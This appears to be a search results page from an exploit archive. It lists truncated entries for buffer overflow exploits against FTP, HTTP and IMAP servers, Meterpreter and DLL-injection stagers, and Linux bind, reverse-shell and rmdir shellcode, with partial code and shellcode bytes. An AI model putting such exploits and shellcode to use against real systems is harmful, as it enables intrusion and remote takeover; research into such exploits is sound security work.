7259 matches found
PCMAN-FTP-2.07-CWD
Exploit Title: PCMAN FTP 2.07 CWD Command Buffer Overflow Date: Jan 25,2014 Exploit Author: Mahmod Mahajna Mahy Version: 2.07 Tested on: Windows 7 sp1 x64 english Email: [email protected] import socket as s from sys import argv iflenargv != 4: print "USAGE: %s host " % argv0 exit1 else: store...
Ultra-Mini-HTTPD-1.21---POST
Exploit Title: Ultra Mini HTTPD stack buffer overflow POST request Date: 16 Feb 2014 Exploit Author: Sumit Vendor Homepage: http://www.picolix.jp/ Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html Version: 1.21 Tested on: Windows XP Professional SP3 A buffer overflow is triggere...
EudoraQualcomm-WorldMail-9.0.333.0
PRE AUTHENTICATION Eudora Qualcomm WorldMail 9.0.333.0 IMAPd Service Preauthentication Buffer Overflow. - Tested on: Windows Server 2003 SP1. - SEH gets overwritten at 749 bytes when using UID command. Only 79 bytes left after SEH, So the shellcode was placed before SEH and backward jump is used...
PCMAN-FTP-2.07
Exploit Title: PCMAN FTP 2.07 Long Command Buffer Overflow unauthenticated Date: Feb 19, 2014 Exploit Author: Sumit Version: 2.07 Tested on: Windows XP Professional SP3 Description: Buffer overflow is triggered upon sending long string to PCMAN FTP 2.07 in place of command import socket import...
python-socket.recvfrom_into()
Exploit Author: @sha0coder Vendor Homepage: python.org Version: python2.7 and python3 Tested on: linux 32bit + python2.7 CVE : CVE-2014-1912 import struct def offo: return struct.pack'L',o reverseIP = '\xc0\xa8\x04\x34' '\xc0\xa8\x01\x0a' reversePort = '\x7a\x69' shellcode from exploit-db.com,...
Acunetix-Web-Vulnerability-Scanner
Exploit write-up: http://osandamalith.wordpress.com/2014/04/24/pwning-script-kiddies-acunetix-buffer-overflow/ /!\ Author is not responsible for any damage you cause This POC is for educational purposes only Video: https://www.youtube.com/watch?v=RHaMx8K1GeM while True: try: choice = intrawinput"...
Kolibri-WebServer-2.0-GET
Exploit Title : Kolibri WebServer 2.0 Get Request SEH Exploit Exploit Author : Revin Hadi S Date : 14/07/2014 Vendor : http://www.senkas.com Version : 2.0 import socket, sys help = """Kolibri WebServer 2.0 Get Request SEH Exploit Target 1Windows XP SP2 Eng & Windows 2003 SP2 Eng 2Windows 7 SP1 En...
HTML-Help-Workshop-1.4
Date: 31/08/2014 Author: mr.pr0n @pr0n Homepage: http://ghostinthelab.wordpress.com/ Software Link: http://msdn.microsoft.com/en-us/library/windows/desktop/ms669985%28v=vs.85%29.aspx Version: 1.4 Tested on: Windows XP SP3 / Windows 7 Pro import subprocess junk = "A" 832 Junk bytes nseh =...
Windows Upload/Execute, Hidden Bind Ipknock TCP Stager
Uploads an executable and runs it staged. Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method you can spoof it with tools like hping. After that you could get your shellcode from any IP. The socket will appea...
VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager
Inject a VNC Dll via a reflective loader staged. Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method you can spoof it with tools like hping. After that you could get your shellcode from any IP. The socket wil...
Reflective DLL Injection, Hidden Bind Ipknock TCP Stager
Inject a DLL via a reflective loader. Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method you can spoof it with tools like hping. After that you could get your shellcode from any IP. The socket will appear as...
Windows Inject DLL, Hidden Bind Ipknock TCP Stager
Inject a custom DLL into the exploited process. Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method you can spoof it with tools like hping. After that you could get your shellcode from any IP. The socket will...
Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager
Inject the Meterpreter server DLL via the Reflective Dll Injection payload staged. Requires Windows XP SP2 or newer. Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method you can spoof it with tools like hping...
Windows Command Shell, Hidden Bind Ipknock TCP Stager
Spawn a piped command shell staged. Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method you can spoof it with tools like hping. After that you could get your shellcode from any IP. The socket will appear as...
x64 Linux bind TCP port shellcode 81 bytes, 96 with password
x64 Linux bind TCP port shellcode 81 bytes, 96 with password. Shellcode exploit for linx86-64 platform / Author: Sean Dillon Copyright: c 2014 CAaNES, LLC. http://caanes.com Release Date: December 19, 2014 Description: x64 Linux null-free TCP bind port shellcode, optional 4 byte password Assemble...
x64 Linux reverse TCP connect 77 to 85 bytes, 90 to 98 with password
x64 Linux reverse TCP connect 77 to 85 bytes, 90 to 98 with password. Shellcode exploit for linx86-64 platform / Author: Sean Dillon Copyright: c 2014 CAaNES, LLC. http://caanes.com Release Date: December 19, 2014 Description: x64 Linux null-free reverse TCP shellcode, optional 4 byte password...
A EXCEL the vulnerabilities the sample shellcode analysis-vulnerability warning-the black bar safety net
0x00 causes Recently I got a EXCEL samples, allegedly an over-all anti-virus of 0day, after the analysis after a let me disappointed, this is a 2 0 1 2-year old vulnerability, not 0day the. Although not picked to the 0day, but this sample of shellcode is still quite distinctive, it is indeed...
linux/x64 bind TCP port shellcode 81 bytes
x64 Linux bind TCP port shellcode 81 bytes, 96 with password / Author: Sean Dillon Copyright: c 2014 CAaNES, LLC. http://caanes.com Release Date: December 19, 2014 Description: x64 Linux null-free TCP bind port shellcode, optional 4 byte password Assembled Size: 81 bytes, 96 with password Tested...
linux/x64 reverse TCP connect shellcode 85 bytes
x64 Linux reverse TCP connect shellcode 77 to 85 bytes, 90 to 98 with password / Author: Sean Dillon Copyright: c 2014 CAaNES, LLC. http://caanes.com Release Date: December 19, 2014 Description: x64 Linux null-free reverse TCP shellcode, optional 4 byte password Assembled Size: 77 - 85 bytes, 90 ...
Linux x86 - rmdir 37 bytes
Linux x86 - rmdir 37 bytes. Shellcode exploit for linux platform / Title: Linux x86 rmdir - 37 bytes Author: kw4 useful for testing purposes 08048060 : 8048060: 31 c0 xor %eax,%eax 8048062: 50 push %eax 8048063: 68 6f 6c 68 6f push $0x6f686c6f 8048068: 68 68 6f 6c 68 push $0x686c6f68 804806d: 68 ...